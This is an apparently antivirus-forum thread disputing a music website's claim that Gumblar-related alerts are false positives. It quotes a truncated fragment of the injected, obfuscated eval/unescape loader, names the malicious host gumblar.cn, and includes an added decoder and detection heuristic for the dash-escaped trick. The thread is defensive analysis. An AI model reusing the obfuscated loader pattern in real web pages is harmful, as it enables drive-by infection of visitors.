Sense.FM 'JS:Downloader-AC (Trj)' message - False Positive?

Hello,

The message I am receiving is as follows:

From hxxp://sense.fm

File name: hxxp://gumblar.cn/rss/?id=
Malware name: JS:Downloader-AC (Trj)

They are claiming this is a false positive:

Analysis of Malware Reports

Whether you are familiar with Virus Protection, you are an advanced computer user, or simply have no idea what we are talking about but are getting weird messages on your Desktop, then follow along. I will attempt to break this down for everyone as simply as possible to help you understand that there is no virus on the Sense FM Website but rather that your Virus Protection software is having a bad day.

Depending on what type of Virus Protection software you use on a PC, Mac, or even Linux, the following analysis will vary slightly. The problem that is happening here is that when you visit hxxp://www.sense.fm suddenly you receive a notification stating that there is a JS Redirect Trojan Horse or something along these lines. If you follow closely the message that you receive you will notice that the file that your virus protection is stating has an infection ends with .JS. Hopefully so far you are following everything I'm saying, as I'm merely outlining that you should pay close attention to the message you are receiving on your Desktop. You may also notice somewhere in your error message (depending on the message body itself) that there is an error with CSS on our website. Like I mentioned earlier, your virus protection software is having a bad day and simply thinks that the Sense.FM website is attempting an injection via browser to your computer. THIS IS NOT TRUE!!! Our website uses various JavaScript codes including URL redirection and rewriting of actual URLs. Since virus protection software generally cannot determine a redirection (in this case) or URL rewriting (also within the issue) as being bad code, it flags it as being malicious.
Limited Troubleshooting Suggestions

Since we do not offer any support for the virus protection software that you use on your computer I will only offer limited support for this. The best solution for this (depending on your virus protection software options) is to modify or change a Web Shield or On-Access option within your virus protection software itself. This will simply eliminate bad false messages from appearing on your desktop, which in fact are not any errors on our website but rather your virus protection software being too sensitive to some files and code within them. If worse comes to worst, you will need to contact the company that supports your virus protection software and consult with them about such an error. They should be aware of this type of scenario and will have a resolution for you as well, similar to the one I stated.

Now my line of reasoning is: if this is true, why would they obfuscate the JavaScript code like so:

(function(Kjh0c){var xu9='%';eval(unescape(('var-20-61-3d-22ScriptEn-67i-6ee-22-2cb-3d-22Version-28)-2b-22-2cj-3d-22-22-2cu-3dnavigat-6fr-2e-75serAgent-3bif(-28u-2e-69nde-78O-66(-22Wi-6e-22)-3e0)-26-26(-75-2einde-78-4ff(-22NT-20-36-22)-3c0-29-26-26(document-2e-63ookie-2eindexOf truncated

But anyway, if someone would be willing to confirm that this is indeed a false positive, I would appreciate it. Claims of false positives coming from a site with obfuscated JavaScript lead me to believe this is lies and they just don't know WTF is going on.

Thanks,
Joe

Hello,

The webpage is infected with a new mutation of a trojan named JS:Redirector-H. Avast users are safe because we are blocking gumblar.cn as a URL and we are catching distribution scripts on that server too (JS:Downloader-AC).

Detection of this new mutation will be added very soon.

Regards

Thanks for the quick response. I’ve forwarded this information off and hopefully they can fix their infection.

- J

Well, they were offline for a while, now showing up with Redirector-H8, -H2, and -H4 variants as well as the Downloader-AC, on all pages, including the comments and contact links.

Hopefully they’ll figure out something is up eventually :frowning:

I think like you about obfuscated JavaScript; considering it is a plain-language scripting language, I can't understand what they would have to hide by obfuscating it.

Given that this alert is directly after the closing Head tag and is distinctly different from all the other script tags on the page, the insertion point and the lack of formatting of the script are typical of code injection.

See image, which I have edited to make it easier to see the code, as it is mostly on the same line.

The fact that % is being replaced by - to hide the escape codes even further tipped me off to it being A Very Bad Thing®. Seems that their heads are still in the sand on this. Do you have any other resources/information that I might be able to forward to the webmaster so that they might be willing to give their site an honest evaluation? Some 3rd party scanner, explanation of SQL injection, something of that sort. I like the music on there and I'd hate to start telling my friends to avoid them like the plague because they have…well…a plague.

Why don’t they trust the nerds? :cry:
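An added example (not from any poster in this thread) of how an analyst can triage the "-XX in place of %XX" trick described above without executing the script: the escaped literal is pulled out, the dashes are turned back into hex escapes and decoded statically, and a simple heuristic flags the eval/unescape/dash-escape combination. The sample script and its decoded contents are constructed for illustration, not the real payload.

```javascript
// Added example: static decoding and triage of the dash-escaped dropper style.
// CONSTRUCTED sample that mimics the layout, decoding to harmless code.
const CONSTRUCTED_SAMPLE =
  "(function(k){var x='%';eval(unescape(('var-20-61-3d-22Script-45ngine-22-3bif(-61)-7b-7d')" +
  ".replace(/-/g,x)))})();";

// Pull the single-quoted string that feeds unescape(...) out of a script text.
function extractEscapedLiteral(script) {
  const m = script.match(/unescape\(\(?'([^']*)'/);
  return m ? m[1] : null;
}

// Undo the substitution the dropper relies on: "-XX" -> "%XX" -> character.
// A literal "-" in the payload would itself have been encoded as -2d, so
// every dash followed by two hex digits is an escape.
function decodeDashEscapes(literal) {
  return literal.replace(/-([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Cheap triage heuristic for a scanner or log-review script:
// eval(unescape(...)) plus a dense run of "-XX" pairs in the literal.
function looksLikeDashEscapedDropper(script) {
  const literal = extractEscapedLiteral(script);
  if (!literal || !/eval\s*\(\s*unescape/.test(script)) return false;
  const pairs = (literal.match(/-[0-9a-fA-F]{2}/g) || []).length;
  return pairs >= 5 && (pairs * 3) / literal.length > 0.3;
}
```

Decoding this way shows an analyst what the script would have run, which is the evidence a webmaster needs when the "false positive" claim is disputed.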

Well, I don't have an easy explanation of SQL Injection, but it takes advantage of vulnerabilities in the software to be able to exploit them and allow code to be inserted when a file is served up. I'm just an avast user like yourself.

I visited the home page again and got the alert again, so nothing has changed on that page that I can see.

Now this type of attack, the hacking of sites and insertion of code, isn't even checked for by many scanners, but they are starting to get wise to it, so we should start to see more detections.

This is one of the only third-party sites that I can think of: you enter the URL that you want to check and it checks out the page and will display its results, which are cached for two hours, http://www.UnmaskParasites.com/security-report/?page=sense.fm. Obviously you would have to run the test again if outside the two-hour cache window, but it isn't difficult and doesn't take long.